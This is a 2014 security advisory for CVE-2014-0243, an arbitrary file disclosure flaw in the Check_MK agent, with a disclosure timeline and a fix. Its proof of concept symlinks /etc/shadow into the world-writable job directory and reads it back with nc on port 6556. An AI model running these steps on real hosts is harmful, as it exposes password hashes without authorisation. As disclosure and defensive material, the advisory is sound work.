CVE-2014-0243 POC

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=== LSE Leading Security Experts GmbH - Security Advisory LSE-2014-05-21 ===

Check_MK - Arbitrary File Disclosure Vulnerability
- --------------------------------------------------

Affected Versions
=================
Linux versions of Check_MK equal or greater than commit
7e9088c09963cb2e76030e8b645607692ec56011 until Release v1.2.5i2p1.

Other platforms are not affected as the vulnerable feature is not
implemented there.

Issue Overview
==============
Technical Risk: high
Likelihood of Exploitation: high
Vendor: Mathias Kettner GmbH
Credits: LSE Leading Security Experts GmbH employees
  Markus Vervier and Sascha Kettler
Advisory URL: https://www.lsexperts.de/advisories/lse-2014-05-21.txt
Advisory Status: Public
CVE-Number: CVE-2014-0243

Issue Description
=================
While conducting a whitebox test LSE Leading Security Experts GmbH
discovered that the Check_MK agent processes files from a directory
with mode 1777. It is not checked if the files are symbolic or hard
filesystem links.

As the Check_MK agent runs with root permissions by default, it will
read arbitrary files and readable devices with root permissions.

The directory mode 1777 was introduced on Sep 5 15:49:46 2013 +0200
in commit 7e9088c09963cb2e76030e8b645607692ec56011:

<<>>
commit 7e9088c09963cb2e76030e8b645607692ec56011
Author: Bernd Stroessenreuther <bs@mathias-kettner.de>
Date:   Thu Sep 5 15:49:46 2013 +0200

    mk-job: /var/lib/check_mk_agent/job directory is now
    created with mode 1777 so mk-job can be used by
    unprivileged users too: fixing bug #1040
<<>>

The vulnerable code in the agent for reading job results from
"/var/lib/check_mk_agent/job" is:

<<>>
# Get statistics about monitored jobs
if cd /var/lib/check_mk_agent/job; then
    echo '<<<job>>>'
    head -n -0 -v *
fi
<<>>

Impact
======
A local user may create a symbolic link in the directory
"/var/lib/check_mk_agent/job", pointing to a file he normally would
not have access to like "/etc/shadow". The agent expects output from
jobs using the mk-job Tool in that directory. It will output the
content of all files in the directory on TCP port 6556 by default.

Temporary Workaround and Fix
============================
LSE Leading Security Experts GmbH advises to remove the write
permissions and the sticky bit for non root users temporarily by
setting mode 755 on the directory.

Proof of Concept
================
    [myhost]$ pwd
    /var/lib/check_mk_agent/job
    [myhost]$ ls -l
    total 0
    [myhost]$ ln -s /etc/shadow
    [myhost]$ ls -la
    total 4
    drwxrwxrwt 2 root   root    4096 May 21 15:17 .
    drwxr-xr-x 3 root   root    4096 Feb 26 13:54 ..
    lrwxrwxrwx 1 myuser mygroup   11 May 21 15:17 shadow -> /etc/shadow
    [myhost]$ nc 127.0.0.1 6556
    [...]
    <<<job>>>
    ==> shadow <==
    root:$6$[...]:16133:0:99999:7:::
    bin:*:15937:0:99999:7:::
    daemon:*:15937:0:99999:7:::
    adm:*:15937:0:99999:7:::
    lp:*:15937:0:99999:7:::
    sync:*:15937:0:99999:7:::
    shutdown:*:15937:0:99999:7:::
    halt:*:15937:0:99999:7:::
    mail:*:15937:0:99999:7:::
    uucp:*:15937:0:99999:7:::
    operator:*:15937:0:99999:7:::
    games:*:15937:0:99999:7:::
    gopher:*:15937:0:99999:7:::
    ftp:*:15937:0:99999:7:::
    nobody:*:15937:0:99999:7:::
    [...]

History
=======
2014-05-20  Issue discovery
2014-05-21  Permission of customer for advisory
2014-05-21  Vendor informed
2014-05-22  CVE requested
2014-05-22  Vendor response
2014-05-22  CVE-2014-0243 assigned
2014-05-26  Official fix available
2014-05-27  Advisory release

- -- 
http://www.lsexperts.de
LSE Leading Security Experts GmbH, Postfach 100121, 64201 Darmstadt
Tel.: +49 (0) 6151 86086-0, Fax: -299,
Unternehmenssitz: Weiterstadt, Amtsgericht Darmstadt: HRB8649
Geschäftsführer: Oliver Michel, Sven Walther